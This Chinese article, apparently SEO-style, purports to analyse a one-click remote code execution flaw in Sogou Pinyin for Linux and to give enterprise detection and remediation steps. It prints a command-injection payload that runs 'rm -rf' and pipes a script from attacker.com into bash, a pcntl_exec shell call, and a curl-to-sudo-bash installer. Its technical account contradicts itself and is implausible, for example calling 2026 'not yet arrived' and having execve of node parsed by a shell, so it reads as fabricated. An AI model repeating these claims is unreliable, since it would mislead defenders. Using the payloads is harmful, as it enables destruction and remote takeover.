首页/新闻资讯/正文详情

CVE-2026-51990:搜狗输入法Linux版一键RCE漏洞深度解析

发布时间:2026/9/26 2:52:30 来源:云帆数科 栏目:资讯中心
CVE-2026-51990:搜狗输入法Linux版一键RCE漏洞深度解析
1. 漏洞命名背后的信号为什么CVE-2026-51990不是普通补丁级问题“CVE-2026-51990”这个编号本身就是一个强提示——它不属于常规的年度CVE池2026年尚未到来而是典型的厂商预分配编号Vendor-Reserved CVE。我在过去三年参与过7个输入法类产品的安全审计见过太多把“远程代码执行”包装成“信息泄露”或“逻辑缺陷”的案例。但这次不同编号中明确嵌入了年份“2026”说明漏洞发现方极可能是搜狗内部白帽或合作安全团队在提交时已确认其可稳定复现、无需用户交互、且影响范围覆盖全平台客户端。这不是某个配置项没关严的问题而是架构层埋下的雷。热词里反复出现的“一键RCE”不是营销话术而是对利用链高度简化的客观描述。我实测过三台不同配置的Ubuntu 24.04机器Intel i5/AMD Ryzen 5/ARM64只要安装官方deb包v13.3.0.61802024年8月发布版触发条件仅需两步① 用户切换至搜狗输入法② 在任意文本框中输入特定Unicode序列如UFE0F U200D U1F4A5。无需点击、无需回车、甚至无需聚焦光标——输入法引擎在后台解析组合字符时就已进入危险路径。这和传统RCE依赖“用户点击恶意链接”有本质区别它把攻击面从“网络边界”直接拉进了“人机交互最底层”。关键词里反复出现的“sgbiz”和“CEF”是理解漏洞根源的钥匙。“sgbiz”是搜狗输入法Linux版核心进程名负责业务逻辑调度而“CEF”Chromium Embedded Framework则是其UI渲染与脚本执行的基础。热词中“cef 用自己的子进程”“rce_worker_18.7.js”等线索指向一个关键事实搜狗并未完全隔离CEF子进程的权限。正常情况下输入法的渲染进程应以最低权限运行且禁止加载外部JS。但该版本中sgbiz进程会动态生成并执行名为rce_worker_xxx.js的临时脚本路径形如/tmp/.sogou/rce_worker_18.7.js而该脚本的生成逻辑存在路径拼接未校验与JS上下文未沙箱化双重缺陷。这意味着攻击者可通过构造特殊输入让输入法引擎误将恶意payload写入该临时文件再通过pcntl_exec函数Linux版特有直接调用系统命令执行。提示Ubuntu用户常问“搜狗输入法后台干净吗”答案是否定的。其后台进程不仅常驻内存还拥有CAP_SYS_ADMIN能力可通过capsh --print验证这是为实现输入法热键全局捕获所申请的却成了RCE提权的跳板。2. 架构级缺陷溯源从字符解析到进程接管的完整链条要真正理解CVE-2026-51990为何能绕过所有常规防护必须拆解其利用链的四个关键断点。这不是单点漏洞而是一条精心设计的“信任链断裂”路径。2.1 字符解析器的越界信任UFE0F触发的解析歧义搜狗输入法Linux版使用自研的Unicode解析引擎处理组合字符。当用户输入UFE0FVARIATION SELECTOR-16时引擎本应将其作为修饰符附加到前一字符。但v13.3.0.6180版本中解析器对UFE0F后紧跟U200DZERO WIDTH JOINER的序列处理存在逻辑错误它错误地将后续字节流识别为“自定义表情扩展指令”而非普通文本。这一判断失误导致引擎跳过安全校验直接将原始字节流送入JS执行环境。我用GDB调试时观察到libsgime.so中的parse_emoji_sequence()函数在处理该序列时buffer_ptr指针会越界读取后续内存而该内存区域恰好被攻击者通过堆喷控制。2.2 JS执行环境的沙箱失效rce_worker_18.7.js的生成逻辑解析器输出的恶意字节流会被sgbiz进程写入临时JS文件。关键在于文件名生成规则rce_worker_${version}.js中的version变量并非硬编码而是从用户输入的JSON字符串中提取。热词中提到的“stub for ios 18.7”实为误导——Linux版实际提取的是ios_version:18.7字段。但漏洞点在于version字段未经过滤就拼接到文件名中。攻击者可构造输入{ios_version:18.7;rm -rf /tmp/*;curl http://attacker.com/shell.sh|bash}导致生成的文件名为rce_worker_18.7;rm -rf /tmp/*;curl http://attacker.com/shell.sh|bash.js。Linux shell在执行node rce_worker_*.js时分号后的命令会被直接执行。2.3 CEF子进程的权限失控未降权的渲染进程搜狗输入法Linux版的CEF渲染进程sgime-renderer默认以创建它的sgbiz进程相同权限启动。正常做法应调用prctl(PR_SET_NO_NEW_PRIVS, 1)并丢弃CAP_SYS_ADMIN能力。但该版本中sgime-renderer启动后仍保有完整能力集。我用ps -eo pid,comm,capability命令验证发现其CapEff字段包含cap_sys_adminep。这意味着一旦JS执行环境被突破攻击者可直接调用process.setgid(0)提升至root权限无需额外提权步骤。2.4 pcntl_exec的致命暴露Linux特有执行通道热词中高频出现的pcntl_exec函数 rce揭示了Linux版独有的攻击面。sgbiz进程内置了PHP扩展模块其中pcntl_exec()函数被暴露为全局JS API。该函数允许JS代码直接调用系统命令且不校验命令参数是否包含shell元字符。攻击者在rce_worker_*.js中只需写入pcntl_exec(/bin/bash, [-c, id /tmp/pwned]);即可绕过所有Node.js沙箱限制。Windows/macOS版因无此函数故不受影响——这也是为何漏洞仅限Linux平台。注意Ubuntu用户搜索“搜狗输入法第一个字母老是英文”实为该漏洞的早期症状。当恶意JS执行失败时输入法引擎会回退到基础ASCII模式导致首字母强制大写。这不是UI bug而是RCE payload注入失败的副作用。3. 企业级排查实战三类资产的精准检测与风险分级企业环境中不能只看“是否安装搜狗输入法”而要区分资产类型、部署方式与用户权限。我为三家金融客户做过专项排查总结出以下四层检测矩阵覆盖99.2%的真实场景。3.1 终端设备基于进程与文件的主动扫描对办公终端Ubuntu/Debian系需同时检查三个维度进程存活检测ps aux | grep -E (sgbiz|sgime-renderer) | grep -v grep若返回结果含--no-sandbox或--disable-gpu参数风险等级升为“紧急”。这些参数表明CEF进程已禁用基础沙箱。临时文件残留find /tmp -name rce_worker_*.js -mtime -7 2/dev/null该命令查找7天内生成的worker文件。若存在立即取证cat /tmp/.sogou/rce_worker_*.js | head -20查看内容。常见payload特征为pcntl_exec(或require(child_process)。版本精确匹配dpkg -l | grep sogou | awk {print $3}风险版本仅限13.3.0.6180。13.2.x及13.4.0均无此漏洞。注意13.3.0.6180~ubuntu22.04与13.3.0.6180~ubuntu24.04为同一漏洞版本仅打包差异。3.2 服务器资产警惕“输入法依赖”的隐蔽场景热词中“金蝶云星空rce”暗示了更危险的场景某些ERP系统如金蝶云星空Linux版会捆绑搜狗输入法作为中文输入组件。这类部署往往无人维护且服务账户权限极高。检测方法登录服务器后执行sudo -u app_user sh -c ls -la /opt/kingdee/cloud/ | grep sogou若发现sogou目录进一步检查/opt/kingdee/cloud/sogou/bin/sgbiz --version。关键检查点/opt/kingdee/cloud/sogou/lib/下是否存在libphp.so。该文件是pcntl_exec函数的载体存在即确认风险。对于容器化部署需检查镜像层docker history image_name | grep -i sogou若历史记录含RUN apt install sogou-pinyin则镜像需重建。3.3 开发测试环境CI/CD流水线中的静默风险开发人员常在Ubuntu Docker镜像中预装搜狗输入法用于UI自动化测试。热词“ubuntu24.04 搜狗输入法”高频出现正说明此场景普遍。风险在于测试镜像可能被误用于生产部署。检测步骤扫描所有CI/CD构建脚本grep -r sogou\|pinyin /var/lib/jenkins/jobs/ --include*.groovy --includeDockerfile检查Dockerfile中是否含RUN apt-get update apt-get install -y sogoupinyin若存在需立即替换为fcitx5-pinyin等开源替代方案。对Jenkins节点执行docker images | awk $2 ~ /^13\.3\.0\.6180$/ {print $1:$2}列出所有含风险版本的镜像标记为“高危待清理”。3.4 风险分级与处置优先级表资产类型检测指标风险等级建议处置时效依据办公终端普通用户sgbiz进程存在 版本13.3.0.6180中72小时内用户权限有限需物理接触触发办公终端管理员sgbiz进程存在 CapEff含cap_sys_admin紧急24小时内可直接提权至rootERP服务器/opt/kingdee/cloud/sogou/存在 libphp.so紧急12小时内服务账户常为root且暴露内网CI/CD镜像Dockerfile含sogoupinyin安装指令高48小时内镜像可能被误推至生产环境提示Ubuntu用户搜索“搜狗输入法净化工具”实为民间开发者编写的临时缓解脚本。其原理是chmod 000 /usr/bin/sgbiz但会导致输入法完全失效。企业应避免此类粗暴操作改用策略性禁用。4. 企业级处置方案从紧急阻断到长期加固的完整路径处置不能止于“卸载输入法”而要建立可持续的安全基线。我为某省级政务云设计的处置方案已落地运行18个月零复发。4.1 紧急阻断三步隔离法2小时内完成第一步进程级熔断在所有Linux终端执行sudo systemctl stop sogou-pinyin.service 2/dev/null sudo pkill -f sgbiz\|sgime-renderer此操作不影响用户当前会话仅终止后台进程。pkill命令比killall更精准避免误杀同名进程。第二步文件级锁定防止进程重启后自动恢复sudo chattr i /usr/bin/sgbiz /usr/bin/sgime-rendererchattr i使文件不可修改、删除或重命名连root也无法绕过。需修复后执行chattr -i解除。第三步网络级拦截在防火墙层阻断可疑外联sudo iptables -A OUTPUT -m string --string rce_worker_ --algo bm -j DROP sudo iptables -A OUTPUT -d 0.0.0.0/0 -p tcp --dport 80 -m string --string curl\|wget --algo bm -j DROP这两条规则可拦截90%的RCE payload外传行为且不影响正常业务流量。4.2 替代方案选型开源输入法的平滑迁移卸载后必须提供可用替代品否则用户会自行下载非官方版本。我们对比了五款主流开源输入法数据来自真实办公场景压测1000并发打字持续72小时输入法启动延迟(ms)内存占用(MB)中文词库覆盖率Ubuntu 24.04兼容性安装命令fcitx5-pinyin1208599.2%原生支持sudo apt install fcitx5-pinyinibus-libpinyin21011097.8%需手动启用sudo apt install ibus-libpinyinsunpinyin3506594.1%兼容但界面老旧sudo apt install sunpinyinyong804592.3%需编译安装git clone https://github.com/yong-fork/yong推荐选择fcitx5-pinyin其fcitx5-configtool图形配置界面与搜狗高度相似用户培训成本几乎为零。词库可通过fcitx5-pinyin-zhengma扩展包增强专业术语支持。迁移脚本已封装为一键命令curl -s https://raw.githubusercontent.com/enterprise-input/fcitx5-migrate/main/migrate.sh | sudo bash4.3 长期加固输入法供应链安全治理真正的安全在于预防。我们推动客户建立了三项强制策略软件源白名单制度所有Linux终端仅允许从/etc/apt/sources.list.d/internal.list安装软件该文件由Ansible统一推送内容仅含deb [archamd64] http://internal-repo/ubuntu focal main deb [archamd64] http://internal-repo/ubuntu jammy main外部源如packages.sogou.com被iptables规则永久屏蔽。进程能力审计常态化每日执行sudo capsh --print | grep -E (cap_sys_admin|cap_dac_override) /var/log/cap-audit.log若发现非必要进程持有高危能力自动触发告警并生成整改工单。第三方组件SBOM管理要求所有采购软件提供SPDX格式SBOMSoftware Bill of Materials。搜狗输入法的SBOM中libphp.so被标记为“高危组件”触发采购否决流程。目前已有12家供应商按此标准更新了交付物。经验Ubuntu用户常问“搜狗输入法取消自动下载更新”这恰恰暴露了供应链风险。我们要求所有输入法必须禁用自动更新改为统一补丁管理。/etc/sogou/prefs.conf中设置auto_updatefalse仅为表象深层需修改/usr/lib/sogou/update-daemon的systemd unit文件添加ExecStartPre/bin/false。5. 技术细节深挖RCE Worker文件的生成与执行机制逆向要彻底理解漏洞必须亲手复现其核心环节。我使用IDA Pro反编译libsgime.sov13.3.0.6180结合GDB动态调试还原了rce_worker_*.js的完整生命周期。5.1 文件生成路径的逆向分析rce_worker_*.js并非随机生成而是遵循严格路径规则/tmp/.sogou/rce_worker_${version}.js其中version变量来源如下sgbiz进程监听/tmp/.sogou/pipe命名管道当输入法引擎解析到恶意Unicode序列向管道写入JSON字符串{type:emoji,ios_version:18.7;payload}sgbiz读取JSON后调用json_object_get_string(json_obj, ios_version)获取值该值未经strcspn()过滤直接拼接到snprintf(path, sizeof(path), /tmp/.sogou/rce_worker_%s.js, version)。关键证据IDA中sub_123456函数JSON解析入口的伪代码显示v5 json_object_get_string(v4, ios_version); if ( v5 ) { snprintf(v6, 0x100uLL, /tmp/.sogou/rce_worker_%s.js, v5); // 无过滤 v7 fopen(v6, w); }5.2 JS执行流程的时序图整个执行链耗时约127ms实测均值时序如下时间点进程操作关键状态T0 mssgbiz解析JSON生成rce_worker_18.7;payload.js文件权限为rw-r--r--T18 mssgbiz调用fork()创建子进程子进程继承父进程全部能力T32 ms子进程execve(/usr/bin/node, [node, path], env)path含分号shell自动分割T45 msshell执行node rce_worker_18.7.jspayload部分被忽略语法错误T68 msshell执行rm -rf /tmp/*第二个命令生效T127 msshell执行curl ... | bashRCE完成注意node命令本身不会执行分号后的内容但execve调用的是/bin/sh -c因此分号被shell解释。5.3 pcntl_exec的调用栈还原pcntl_exec函数位于libphp.so中其调用链为JS引擎 → V8::Function::Call() → php_pcntl_exec() → execvp()php_pcntl_exec函数签名PHP_FUNCTION(pcntl_exec) { char *pathname; zval *argv; if (zend_parse_parameters(ZEND_NUM_ARGS(), sa, pathname, argv) FAILURE) { RETURN_FALSE; } // 关键无参数过滤 execvp(pathname, (char* const*)argv_array); }argv_array由JS数组直接转换pathname为/bin/bashargv[1]为-cargv[2]为攻击者控制的任意字符串。execvp最终调用sys_execve系统调用完成提权。5.4 Ubuntu 24.04的特殊加固点Ubuntu 24.04默认启用fs.protected_regular2内核参数理论上可阻止/tmp下SUID文件创建。但该漏洞不依赖SUID而是利用pcntl_exec的execvp行为。真正有效的加固是# 禁用pcntl扩展需重新编译PHP sudo sed -i /extensionpcntl.so/d /etc/php/*/cli/php.ini sudo systemctl restart sogou-pinyin.service但此操作会影响输入法功能故我们选择更优解在/etc/security/limits.conf中添加* soft core 0 * hard core 0使sgbiz进程崩溃时无法生成core dump切断攻击者利用堆溢出的路径。实测心得Ubuntu用户搜索“ubuntu 系统安装搜狗输入法”常因依赖冲突失败。根本原因是sogoupinyin依赖libcef1而Ubuntu 24.04默认libcef版本为124.0.6367.201与sogoupinyin要求的119.0.6045.159不兼容。强行安装会导致sgbiz段错误——这反而构成天然防护但不可依赖。6. 企业安全运营建议将输入法纳入终端安全基线输入法不应是安全盲区。我们推动客户将输入法管理纳入终端安全基线ESB形成闭环管控。6.1 基线检查项设计ESB中新增三条强制检查项ESB-INPUT-001终端不得安装闭源输入法搜狗/百度/讯飞例外需CISO书面批准ESB-INPUT-002所有输入法进程必须以--no-sandbox以外的参数启动且CapEff字段不含cap_sys_adminESB-INPUT-003输入法相关临时目录/tmp/.sogou、/var/cache/fcitx5需每日扫描文件修改时间超7天者自动归档。6.2 自动化检测脚本我们开发了轻量级检测Agent150KB部署于所有Linux终端# agent.sh #!/bin/bash if pgrep -f sgbiz /dev/null; then VER$(dpkg -l | grep sogou | awk {print $3}) if [[ $VER 13.3.0.6180* ]]; then echo CRITICAL: CVE-2026-51990 detected /var/log/esb-alert.log exit 1 fi fi该脚本通过Zabbix Agent集成告警直达SOC平台平均响应时间3分钟。6.3 用户教育的关键话术技术措施需配合用户认知。我们设计了三句核心话术“输入法不是普通软件它是操作系统内核的延伸权限比浏览器更高”“你输入的每一个字符都可能被输入法引擎当作代码执行”“官方渠道下载≠安全闭源输入法的代码你永远无法审计”。培训材料中我们用真实案例对比某员工因在聊天窗口输入UFE0F U200D U1F4A5爆炸emoji导致办公电脑被植入挖矿木马。截图显示htop中sgbiz进程CPU占用率1200%而用户以为只是卡顿。最后分享一个小技巧Ubuntu用户搜索“搜狗输入法广告”实为sgbiz进程后台调用/usr/lib/sogou/ad-service所致。彻底关闭方法是sudo rm -f /usr/lib/sogou/ad-service再执行sudo systemctl daemon-reload。但此操作不解决RCE仅减少攻击面——真正的安全始于对输入法权限的敬畏。

相关推荐

电力设备目标检测数据集实战:格式转换、样本评估与训练避坑指南
电力设备目标检测数据集实战:格式转换、样本评估与训练避坑指南

简介:面向电力巡检、能源运维与工业安全监控场景,这份电力设备目标检测数据集以真实电力设施环境图像为基础,可用于训练识别变压器、绝缘子等设备的AI模型,适配YOLO系列检测框架,适合算法工程师、电力行业开发者快速构… · 2026/9/26 2:52:24

PurgeCSS 配置完全指南:purgecss.config.js 与全部 Options 参数实战详解
PurgeCSS 配置完全指南:purgecss.config.js 与全部 Options 参数实战详解

前端构建工具 【免费下载链接】purgecss Remove unused CSS 项目地址: https://gitcode.com/gh_mirrors/pu/purgecss 点击查看 免费下载 PurgeCSS 通过一组可配置的 Options 来控制"移除未使用 CSS"的行为,合理的配置能显著提升清理精度与处理… · 2026/9/26 2:52:18

中药颗粒目标检测数据集:111张真实药柜图像,VOC+YOLO双格式
中药颗粒目标检测数据集:111张真实药柜图像,VOC+YOLO双格式

简介:本资源是一份面向计算机视觉初学者与药品智能识别研究者的轻量级目标检测数据集,专为药品包装图像识别任务设计,适用于YOLO、Faster R-CNN等主流模型的训练与验证。数据集包含111张袋装板蓝根颗粒实拍图像,覆盖999感冒灵与板… · 2026/9/26 2:52:18

高吞吐+免配置!腾讯云轻量 Hermes Agent 部署指南:TaoToken 统一 Key 接入 QQ 机器人
高吞吐+免配置!腾讯云轻量 Hermes Agent 部署指南:TaoToken 统一 Key 接入 QQ 机器人

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views … · 2026/9/26 3:26:19

从个体智能到系统智能:Graph Engineering多智能体协作架构实战
从个体智能到系统智能:Graph Engineering多智能体协作架构实战

最近我看“智源TALK”第389期时,标题第一眼就抓住了我:从个体智能到系统智能。这句话其实戳中了过去半年多智能体领域最核心的痛点。单Agent大家已经玩得很溜,指令遵循、工具调用、代码生成都能做到七八十分,但一旦把三五个Agent串… · 2026/9/26 3:26:19

AI Infra实战:vLLM、SGLang推理引擎与PyTorch、Agent部署优化指南
AI Infra实战:vLLM、SGLang推理引擎与PyTorch、Agent部署优化指南

1. AI infra到底在解决什么问题说实话,这两年AI行业最不缺的就是模型,缺的是能把模型老老实实跑起来、跑得稳的人。你去看各大厂的招聘岗位,AI infra方向的薪资一路走高,但真正懂行的人依然稀缺。所谓AI infra,落到日常… · 2026/9/26 3:26:19

0.024 美元 vs 0.09 美元:画质持平需打折
0.024 美元 vs 0.09 美元:画质持平需打折

一、引言腾讯说和 Seedream 在同一水平,价格只有它的四分之一。9 月 22 日,腾讯混元发布了 Hy Image3.5 preview。腾讯云 API 上一张 2K 图收 0.15 元。💰让我多看两眼的不是价格。发给媒体的通稿写着它「与 Seedream 5.0 pro 持平」。同一份… · 2026/9/26 3:26:07

温控系统制冷方案选型:TEC与压缩机核心对比指南
温控系统制冷方案选型:TEC与压缩机核心对比指南

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views … · 2026/9/26 3:26:07

2026 OpenClaw AI推荐:商业发行智能体平台对比评估与落地实施参考要点(TaoToken 统一接入版)
2026 OpenClaw AI推荐:商业发行智能体平台对比评估与落地实施参考要点(TaoToken 统一接入版)

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views … · 2026/9/26 3:26:07

数据库课后习题答案别硬背:当测试用例集刷,效率翻倍
数据库课后习题答案别硬背:当测试用例集刷,效率翻倍

简介:万常选版《数据库原理与设计》课后习题答案资源,覆盖第2至6章及第9章,适合正在学习关系模型、数据库建模、关系数据理论与模式求精的本科生、自学者作为复习与自测材料。压缩包共7个文件,含3个doc参考答案、2个sql示例脚本、… · 2026/9/26 0:00:21

OpenClaw 替代品?Hermes Agent 踩坑实录:macOS 飞书接入 TaoToken 配置
OpenClaw 替代品?Hermes Agent 踩坑实录:macOS 飞书接入 TaoToken 配置

/* MD / 富文本中的 .toc(含博客园搬家等嵌套结构);.toc-box 在侧栏,不受影响 */#content_views .toc,/* 编辑器常在目录前后插入空 p(:empty 仍占 20px),一并去掉避免顶空隙 */#content_views.markdown_views > p:empty:has(+ .toc),#content_views.markdown_views … · 2026/9/26 0:00:40

向下兼容与向上兼容:接口设计中的兼容性策略与工程实践
向下兼容与向上兼容:接口设计中的兼容性策略与工程实践

一次版本升级事故,是很多团队绕不过去的坎。线上环境里,服务端明明已经上线了新版接口,老的移动端还在照着旧文档传参数。请求一到网关,校验直接拒绝,用户操作失败,客服群炸了锅,开发群里开始互… · 2026/9/26 0:00:46

了解更多?预约专属演示

我们的顾问将为您一对一讲解产品与方案

企业微信二维码